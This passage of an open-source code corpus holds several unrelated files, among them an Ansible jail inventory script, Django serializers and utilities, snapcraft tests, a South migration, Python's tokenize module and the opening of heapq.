# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIPFilterProfilesFetcher(NURESTFetcher):
""" Represents a NUIPFilterProfiles fetcher
Notes:
This fetcher enables to fetch NUIPFilterProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIPFilterProfile class that is managed.
Returns:
.NUIPFilterProfile: the managed class
"""
from .. import NUIPFilterProfile
return NUIPFilterProfile
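# Illustrative sketch (added; attribute and method names are assumptions):
# fetchers like this one are normally not instantiated directly but exposed as
# an attribute of a parent entity, e.g.:
#
#   profiles = parent.ip_filter_profiles.get()        # list of NUIPFilterProfile
#   first = parent.ip_filter_profiles.get_first()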
| bsd-3-clause |
bols-blue/ansible | plugins/inventory/jail.py | 132 | 1288 | #!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['jls', '-q', 'name'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'jail'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'jail'})
else:
print "Need an argument, either --list or --host <host>"
| gpl-3.0 |
maikodaraine/EnlightenmentUbuntu | bindings/python/python-efl/examples/elementary/test_segment_control.py | 1 | 2798 | #!/usr/bin/env python
# encoding: utf-8
import os
from efl.evas import EVAS_HINT_EXPAND, EVAS_HINT_FILL
from efl import elementary
from efl.elementary.window import StandardWindow
from efl.elementary.box import Box
from efl.elementary.icon import Icon
from efl.elementary.segment_control import SegmentControl
EXPAND_BOTH = EVAS_HINT_EXPAND, EVAS_HINT_EXPAND
EXPAND_HORIZ = EVAS_HINT_EXPAND, 0.0
FILL_BOTH = EVAS_HINT_FILL, EVAS_HINT_FILL
FILL_HORIZ = EVAS_HINT_FILL, 0.5
script_path = os.path.dirname(os.path.abspath(__file__))
img_path = os.path.join(script_path, "images")
def cb_seg_changed(seg, item):
print(seg)
print(item)
def segment_control_clicked(obj):
win = StandardWindow("segment-control", "Segment Control test",
autodel=True, size=(320, 280))
if obj is None:
win.callback_delete_request_add(lambda o: elementary.exit())
vbox = Box(win, size_hint_weight=EXPAND_BOTH, size_hint_align=FILL_BOTH)
win.resize_object_add(vbox)
vbox.show()
# segment 1
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "Only Text")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic)
ic = Icon(win)
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic, "Text + Icon")
seg.item_add(None, "Seg4")
seg.item_add(None, "Seg5")
seg.callback_changed_add(cb_seg_changed)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 2
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "SegmentItem")
it = seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 3
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=(0.5, 0.5))
for i in range(3):
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
if i == 1:
it = seg.item_add(ic)
else:
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 4
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ, disabled=True)
seg.item_add(None, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
win.show()
if __name__ == "__main__":
elementary.init()
segment_control_clicked(None)
elementary.run()
elementary.shutdown()
| unlicense |
AlexanderKaluzhny/instanotifier | instanotifier/notification/serializers.py | 1 | 1953 | from copy import deepcopy
import hashlib
from bs4 import BeautifulSoup
from rest_framework import serializers
from instanotifier.notification.models import RssNotification
from instanotifier.notification.utils import html
def _parse_country(summary):
soup = BeautifulSoup(summary, features="html5lib")
country_tag = soup.find(text="Country")
if country_tag:
country = country_tag.find_next(string=True).strip(': \n')
return country
return "Unknown"
def _compute_entry_id_hash(entry_id):
return hashlib.md5(entry_id.encode("utf-8")).hexdigest()
class RssNotificationCreateSerializer(serializers.ModelSerializer):
"""
Creates the RssNotification from the data provided by Feed parser.
Evaluates the necessary fields deriving it from the data.
"""
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
def to_internal_value(self, data):
new_data = deepcopy(data)
new_data['entry_id'] = data['id']
new_data['country'] = 'TBD' # it is a derived field, we will set it based on "summary" field
new_data['internal_id'] = 'TBD' # it is a derived field, we will set it based on "entry_id" field
new_data = super().to_internal_value(new_data)
return new_data
def validate_summary(self, value):
summary = html.clean_html(value)
return summary
def validate(self, validated_data):
summary = validated_data["summary"]
validated_data["country"] = _parse_country(summary)
validated_data["internal_id"] = _compute_entry_id_hash(validated_data["entry_id"])
return validated_data
class RssNotificationUpdateSerializer(serializers.ModelSerializer):
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
| mit |
stgraber/snapcraft | integration_tests/test_make_plugin.py | 6 | 2306 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import (
DirExists,
Not
)
import integration_tests
class MakePluginTestCase(integration_tests.TestCase):
def test_stage_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_clean_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('snap', project_dir)
snap_dirs = ('stage', 'parts', 'prime')
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), DirExists())
self.run_snapcraft('clean', project_dir)
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), Not(DirExists()))
def test_nonstandard_makefile(self):
project_dir = 'simple-make-nonstandard-makefile'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_stage_make_with_artifacts(self):
project_dir = 'simple-make-artifacts'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'test'),
cwd=project_dir)
self.assertEqual('Hello World!\n', binary_output)
| gpl-3.0 |
gustavomazevedo/tbackup-client | client/migrations/0009_auto__add_field_backup_origin__chg_field_backup_remote_id.py | 1 | 4529 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Backup.origin'
db.add_column(u'client_backup', 'origin',
self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True),
keep_default=False)
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'Backup.origin'
db.delete_column(u'client_backup', 'origin')
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(default=0))
models = {
'client.backup': {
'Meta': {'object_name': 'Backup'},
'destination': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'remote_backup_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.Schedule']"})
},
'client.oplog': {
'Meta': {'object_name': 'OpLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'client.origin': {
'Meta': {'object_name': 'Origin'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {})
},
'client.rrule': {
'Meta': {'object_name': 'RRule'},
'description': ('django.db.models.fields.TextField', [], {}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'client.schedule': {
'Meta': {'object_name': 'Schedule'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'destination': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 27, 0, 0)'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.RRule']", 'null': 'True', 'blank': 'True'})
},
'client.webserver': {
'Meta': {'object_name': 'WebServer'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'api_root': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
}
}
complete_apps = ['client'] | mit |
makacodewalker/etsgh | django/utils/datetime_safe.py | 496 | 2685 | # Python's datetime strftime doesn't handle dates before 1900.
# These classes override date and datetime to support the formatting of a date
# through its full "proleptic Gregorian" date range.
#
# Based on code submitted to comp.lang.python by Andrew Dalke
#
# >>> datetime_safe.date(1850, 8, 2).strftime("%Y/%m/%d was a %A")
# '1850/08/02 was a Friday'
from datetime import date as real_date, datetime as real_datetime
import re
import time
class date(real_date):
def strftime(self, fmt):
return strftime(self, fmt)
class datetime(real_datetime):
def strftime(self, fmt):
return strftime(self, fmt)
def combine(self, date, time):
        return datetime(date.year, date.month, date.day, time.hour, time.minute, time.second, time.microsecond, time.tzinfo)
def date(self):
return date(self.year, self.month, self.day)
def new_date(d):
"Generate a safe date from a datetime.date object."
return date(d.year, d.month, d.day)
def new_datetime(d):
"""
Generate a safe datetime from a datetime.date or datetime.datetime object.
"""
kw = [d.year, d.month, d.day]
if isinstance(d, real_datetime):
kw.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])
return datetime(*kw)
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(dt, fmt):
if dt.year >= 1900:
return super(type(dt), dt).strftime(fmt)
illegal_formatting = _illegal_formatting.search(fmt)
if illegal_formatting:
raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
year = dt.year
# For every non-leap year century, advance by
# 6 years to get into the 28-year repeat cycle
delta = 2000 - year
off = 6 * (delta // 100 + delta // 400)
year = year + off
# Move to around the year 2000
year = year + ((2000 - year) // 28) * 28
timetuple = dt.timetuple()
s1 = time.strftime(fmt, (year,) + timetuple[1:])
sites1 = _findall(s1, str(year))
s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
sites2 = _findall(s2, str(year+28))
sites = []
for site in sites1:
if site in sites2:
sites.append(site)
s = s1
syear = "%04d" % (dt.year,)
for site in sites:
s = s[:site] + syear + s[site+4:]
return s
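# Illustrative sketch (added): converting a standard datetime into the safe
# wrapper defined above so pre-1900 values can be formatted.
#
#   from datetime import datetime as _std_datetime
#   safe = new_datetime(_std_datetime(1850, 8, 2, 12, 30))
#   safe.strftime("%H:%M on %d %B %Y")   # plain datetime.strftime would raise here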
| bsd-3-clause |
j00bar/django-widgy | widgy/contrib/form_builder/views.py | 1 | 1271 | from django.views.generic.edit import FormMixin
from django.shortcuts import get_object_or_404
from widgy.models import Node
class HandleFormMixin(FormMixin):
"""
An abstract view mixin for handling form_builder.Form submissions.
"""
def post(self, *args, **kwargs):
"""
copied from django.views.generic.edit.ProcessFormView, because we want
the post method, but not the get method.
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
put = post
def get_form_node(self):
node = get_object_or_404(Node, pk=self.kwargs['form_node_pk'])
node.prefetch_tree()
return node
def get_form_class(self):
self.form_node = self.get_form_node()
return self.form_node.content.build_form_class()
def get_context_data(self, **kwargs):
if 'form' in kwargs:
kwargs.setdefault(self.form_node.content.context_var, kwargs['form'])
return super(HandleFormMixin, self).get_context_data(**kwargs)
def form_valid(self, form):
return self.form_node.content.execute(self.request, form)
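# Illustrative sketch (added; names are hypothetical): the mixin above is meant
# to be combined with a normal Django view that renders the page containing the
# widgy form, e.g.:
#
#   class PageView(HandleFormMixin, DetailView):
#       template_name = "page.html"    # the URL must supply 'form_node_pk'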
| apache-2.0 |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Lib/tokenize.py | 62 | 16326 | """Tokenization help for Python programs.
generate_tokens(readline) is a generator that breaks a stream of
text into Python tokens. It accepts a readline-like method which is called
repeatedly to get the next line of input (or "" for EOF). It generates
5-tuples with these members:
the token type (see token.py)
the token (a string)
the starting (row, column) indices of the token (a 2-tuple of ints)
the ending (row, column) indices of the token (a 2-tuple of ints)
the original line (string)
It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators
Older entry points
tokenize_loop(readline, tokeneater)
tokenize(readline, tokeneater=printtoken)
are the same, except instead of generating tokens, tokeneater is a callback
function to which the 5 fields described above are passed as 5 arguments,
each time a new token is found."""
__author__ = 'Ka-Ping Yee <[email protected]>'
__credits__ = \
'GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, Skip Montanaro, Raymond Hettinger'
import string, re
from token import *
import token
__all__ = [x for x in dir(token) if x[0] != '_'] + ["COMMENT", "tokenize",
"generate_tokens", "NL", "untokenize"]
del x
del token
COMMENT = N_TOKENS
tok_name[COMMENT] = 'COMMENT'
NL = N_TOKENS + 1
tok_name[NL] = 'NL'
N_TOKENS += 2
def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'[a-zA-Z_]\w*'
Hexnumber = r'0[xX][\da-fA-F]+[lL]?'
Octnumber = r'(0[oO][0-7]+)|(0[0-7]*)[lL]?'
Binnumber = r'0[bB][01]+[lL]?'
Decnumber = r'[1-9]\d*[lL]?'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?\d+'
Pointfloat = group(r'\d+\.\d*', r'\.\d+') + maybe(Exponent)
Expfloat = r'\d+' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'\d+[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)
# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group("[uU]?[rR]?'''", '[uU]?[rR]?"""')
# Single-line ' or " string.
String = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*"')
# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"<>", r"!=",
r"//=?",
r"[+\-*/%&|^=<>]=?",
r"~")
Bracket = '[][(){}]'
Special = group(r'\r?\n', r'[:;.,`@]')
Funny = group(Operator, Bracket, Special)
PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken
# First (or only) line of ' or " string.
ContStr = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
group("'", r'\\\r?\n'),
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)
tokenprog, pseudoprog, single3prog, double3prog = map(
re.compile, (Token, PseudoToken, Single3, Double3))
endprogs = {"'": re.compile(Single), '"': re.compile(Double),
"'''": single3prog, '"""': double3prog,
"r'''": single3prog, 'r"""': double3prog,
"u'''": single3prog, 'u"""': double3prog,
"ur'''": single3prog, 'ur"""': double3prog,
"R'''": single3prog, 'R"""': double3prog,
"U'''": single3prog, 'U"""': double3prog,
"uR'''": single3prog, 'uR"""': double3prog,
"Ur'''": single3prog, 'Ur"""': double3prog,
"UR'''": single3prog, 'UR"""': double3prog,
"b'''": single3prog, 'b"""': double3prog,
"br'''": single3prog, 'br"""': double3prog,
"B'''": single3prog, 'B"""': double3prog,
"bR'''": single3prog, 'bR"""': double3prog,
"Br'''": single3prog, 'Br"""': double3prog,
"BR'''": single3prog, 'BR"""': double3prog,
'r': None, 'R': None, 'u': None, 'U': None,
'b': None, 'B': None}
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"b'''", 'b"""', "B'''", 'B"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"b'", 'b"', "B'", 'B"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"' ):
single_quoted[t] = t
tabsize = 8
class TokenError(Exception): pass
class StopTokenizing(Exception): pass
def printtoken(type, token, srow_scol, erow_ecol, line): # for testing
srow, scol = srow_scol
erow, ecol = erow_ecol
print "%d,%d-%d,%d:\t%s\t%s" % \
(srow, scol, erow, ecol, tok_name[type], repr(token))
def tokenize(readline, tokeneater=printtoken):
"""
The tokenize() function accepts two parameters: one representing the
input stream, and one providing an output mechanism for tokenize().
The first parameter, readline, must be a callable object which provides
the same interface as the readline() method of built-in file objects.
Each call to the function should return one line of input as a string.
The second parameter, tokeneater, must also be a callable object. It is
called once for each token, with five arguments, corresponding to the
tuples generated by generate_tokens().
"""
try:
tokenize_loop(readline, tokeneater)
except StopTokenizing:
pass
# backwards compatible interface
def tokenize_loop(readline, tokeneater):
for token_info in generate_tokens(readline):
tokeneater(*token_info)
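# Illustrative sketch (added): generate_tokens() below can be driven from any
# readline-compatible callable, for example a StringIO:
#
#   from StringIO import StringIO
#   for toktype, tokstr, start, end, line in generate_tokens(StringIO("1 + 2\n").readline):
#       print tok_name[toktype], repr(tokstr)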
class Untokenizer:
def __init__(self):
self.tokens = []
self.prev_row = 1
self.prev_col = 0
def add_whitespace(self, start):
row, col = start
assert row <= self.prev_row
col_offset = col - self.prev_col
if col_offset:
self.tokens.append(" " * col_offset)
def untokenize(self, iterable):
for t in iterable:
if len(t) == 2:
self.compat(t, iterable)
break
tok_type, token, start, end, line = t
self.add_whitespace(start)
self.tokens.append(token)
self.prev_row, self.prev_col = end
if tok_type in (NEWLINE, NL):
self.prev_row += 1
self.prev_col = 0
return "".join(self.tokens)
def compat(self, token, iterable):
startline = False
indents = []
toks_append = self.tokens.append
toknum, tokval = token
if toknum in (NAME, NUMBER):
tokval += ' '
if toknum in (NEWLINE, NL):
startline = True
prevstring = False
for tok in iterable:
toknum, tokval = tok[:2]
if toknum in (NAME, NUMBER):
tokval += ' '
# Insert a space between two consecutive strings
if toknum == STRING:
if prevstring:
tokval = ' ' + tokval
prevstring = True
else:
prevstring = False
if toknum == INDENT:
indents.append(tokval)
continue
elif toknum == DEDENT:
indents.pop()
continue
elif toknum in (NEWLINE, NL):
startline = True
elif startline and indents:
toks_append(indents[-1])
startline = False
toks_append(tokval)
def untokenize(iterable):
"""Transform tokens back into Python source code.
Each element returned by the iterable must be a token sequence
with at least two elements, a token number and token value. If
only two tokens are passed, the resulting output is poor.
Round-trip invariant for full input:
Untokenized source will match input source exactly
Round-trip invariant for limited intput:
# Output text will tokenize the back to the input
t1 = [tok[:2] for tok in generate_tokens(f.readline)]
newcode = untokenize(t1)
readline = iter(newcode.splitlines(1)).next
t2 = [tok[:2] for tok in generate_tokens(readline)]
assert t1 == t2
"""
ut = Untokenizer()
return ut.untokenize(iterable)
def generate_tokens(readline):
"""
    The generate_tokens() generator requires one argument, readline, which
must be a callable object which provides the same interface as the
readline() method of built-in file objects. Each call to the function
should return one line of input as a string. Alternately, readline
can be a callable function terminating with StopIteration:
readline = open(myfile).next # Example of alternate readline
The generator produces 5-tuples with these members: the token type; the
token string; a 2-tuple (srow, scol) of ints specifying the row and
column where the token begins in the source; a 2-tuple (erow, ecol) of
ints specifying the row and column where the token ends in the source;
and the line on which the token was found. The line passed is the
logical line; continuation lines are included.
"""
lnum = parenlev = continued = 0
namechars, numchars = string.ascii_letters + '_', '0123456789'
contstr, needcont = '', 0
contline = None
indents = [0]
while 1: # loop over lines in stream
try:
line = readline()
except StopIteration:
line = ''
lnum = lnum + 1
pos, max = 0, len(line)
if contstr: # continued string
if not line:
raise TokenError, ("EOF in multi-line string", strstart)
endmatch = endprog.match(line)
if endmatch:
pos = end = endmatch.end(0)
yield (STRING, contstr + line[:end],
strstart, (lnum, end), contline + line)
contstr, needcont = '', 0
contline = None
elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
yield (ERRORTOKEN, contstr + line,
strstart, (lnum, len(line)), contline)
contstr = ''
contline = None
continue
else:
contstr = contstr + line
contline = contline + line
continue
elif parenlev == 0 and not continued: # new statement
if not line: break
column = 0
while pos < max: # measure leading whitespace
if line[pos] == ' ': column = column + 1
elif line[pos] == '\t': column = (column/tabsize + 1)*tabsize
elif line[pos] == '\f': column = 0
else: break
pos = pos + 1
if pos == max: break
if line[pos] in '#\r\n': # skip comments or blank lines
if line[pos] == '#':
comment_token = line[pos:].rstrip('\r\n')
nl_pos = pos + len(comment_token)
yield (COMMENT, comment_token,
(lnum, pos), (lnum, pos + len(comment_token)), line)
yield (NL, line[nl_pos:],
(lnum, nl_pos), (lnum, len(line)), line)
else:
yield ((NL, COMMENT)[line[pos] == '#'], line[pos:],
(lnum, pos), (lnum, len(line)), line)
continue
if column > indents[-1]: # count indents or dedents
indents.append(column)
yield (INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
while column < indents[-1]:
if column not in indents:
raise IndentationError(
"unindent does not match any outer indentation level",
("<tokenize>", lnum, pos, line))
indents = indents[:-1]
yield (DEDENT, '', (lnum, pos), (lnum, pos), line)
else: # continued statement
if not line:
raise TokenError, ("EOF in multi-line statement", (lnum, 0))
continued = 0
while pos < max:
pseudomatch = pseudoprog.match(line, pos)
if pseudomatch: # scan for tokens
start, end = pseudomatch.span(1)
spos, epos, pos = (lnum, start), (lnum, end), end
token, initial = line[start:end], line[start]
if initial in numchars or \
(initial == '.' and token != '.'): # ordinary number
yield (NUMBER, token, spos, epos, line)
elif initial in '\r\n':
yield (NL if parenlev > 0 else NEWLINE,
token, spos, epos, line)
elif initial == '#':
assert not token.endswith("\n")
yield (COMMENT, token, spos, epos, line)
elif token in triple_quoted:
endprog = endprogs[token]
endmatch = endprog.match(line, pos)
if endmatch: # all on one line
pos = endmatch.end(0)
token = line[start:pos]
yield (STRING, token, spos, (lnum, pos), line)
else:
strstart = (lnum, start) # multiple lines
contstr = line[start:]
contline = line
break
elif initial in single_quoted or \
token[:2] in single_quoted or \
token[:3] in single_quoted:
if token[-1] == '\n': # continued string
strstart = (lnum, start)
endprog = (endprogs[initial] or endprogs[token[1]] or
endprogs[token[2]])
contstr, needcont = line[start:], 1
contline = line
break
else: # ordinary string
yield (STRING, token, spos, epos, line)
elif initial in namechars: # ordinary name
yield (NAME, token, spos, epos, line)
elif initial == '\\': # continued stmt
continued = 1
else:
if initial in '([{': parenlev = parenlev + 1
elif initial in ')]}': parenlev = parenlev - 1
yield (OP, token, spos, epos, line)
else:
yield (ERRORTOKEN, line[pos],
(lnum, pos), (lnum, pos+1), line)
pos = pos + 1
for indent in indents[1:]: # pop remaining indent levels
yield (DEDENT, '', (lnum, 0), (lnum, 0), '')
yield (ENDMARKER, '', (lnum, 0), (lnum, 0), '')
if __name__ == '__main__': # testing
import sys
if len(sys.argv) > 1: tokenize(open(sys.argv[1]).readline)
else: tokenize(sys.stdin.readline)
| gpl-2.0 |
Jionglun/-w16b_test | static/Brython3.1.3-20150514-095342/Lib/heapq.py | 628 | 18065 | """Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by Kevin O'Connor, augmented by Tim Peters and Raymond Hettinger
__about__ = """Heap queues
[explanation by François Pinard]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
                                   0
                  1                                 2
          3               4                5               6
      7       8       9       10      11      12      13      14
    15 16   17 18   19 20   21 22   23 24   25 26   27 28   29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
a usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
